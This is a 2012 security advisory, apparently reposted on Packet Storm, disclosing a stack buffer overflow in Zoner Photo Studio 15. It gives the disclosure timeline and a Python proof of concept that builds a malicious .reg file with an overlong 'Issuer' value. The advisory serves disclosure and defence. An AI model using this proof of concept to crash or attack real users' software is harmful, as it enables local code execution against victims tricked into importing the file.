Zoner Photo Studio 15 builds 2 and 3 suffer from a stack-based buffer overflow vulnerability. Full proof of concept code included.
562915b74a8fedb12889e09ea4190964fe550f41396e218b3d54305d5f1f93d6Inshell Security Advisory
http://www.inshell.net
1. ADVISORY INFORMATION
-----------------------
Product: Zoner Photo Studio
Vendor URL: www.zoner.com
Type: Stack-based Buffer Overflow [CWE-121]
Date found: 2012-10-17
Date published: 2012-11-09
CVSSv2 Score: 4,4 (AV:L/AC:M/Au:N/C:P/I:P/A:P)
CVE: -
2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
Inshell Security.
3. VERSIONS AFFECTED
--------------------
Zoner Photo Studio 15 Build 3
Zoner Photo Studio 15 Build 2, older versions may be affected too.
4. VULNERABILITY DESCRIPTION
----------------------------
A stack-based buffer overflow vulnerability has been identified in Zoner
Photo Studio 15 Build 2 and 3.
When launching, the application loads the "Issuer" value from the
registry key "[HKEY_CURRENT_USER\Software\ZONER\Zoner Photo Studio
15\Preferences\Certificate]", but it does not validate the length of the
string loaded from the key before passing it to a buffer, which leads to
a stack-based buffer overflow.
An attacker needs to force the victim to import an arbitrary .reg file
to exploit this vulnerability.
5. PROOF-OF-CONCEPT (CODE / Exploit)
------------------------------------
#!/usr/bin/python
file="poc.reg"
junk1="\x41" * 2140
boom="\x42\x42\x42\x42"
junk2="\x43" * 1000
poc="Windows Registry Editor Version 5.00\n\n"
poc=poc + "[HKEY_CURRENT_USER\Software\ZONER\Zoner Photo Studio
15\Preferences\Certificate]\n"
poc=poc + "\"Issuer\"=\"" + junk1 + boom + junk2 + "\""
try:
print "[*] Creating exploit file...\n";
writeFile = open (file, "w")
writeFile.write( poc )
writeFile.close()
print "[*] File successfully created!";
except:
print "[!] Error while creating file!";
For technical details, screenshots and/or PoCs visit:
http://security.inshell.net/advisory/42
6. SOLUTION
-----------
None
7. REPORT TIMELINE
------------------
2012-10-17: Initial notification sent to vendor about bug in Build 2
2012-10-18: Vendor Feedback / Response
2012-10-22: Short vendor statement about expected delay
2012-10-29: Notification about the disclosure date
2012-**-**: Vendor releases Build 3 which is still vulnerable
2012-11-09: No response
2012-11-09: Full Disclosure according to disclosure policy
8. REFERENCES
-------------
http://security.inshell.net
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed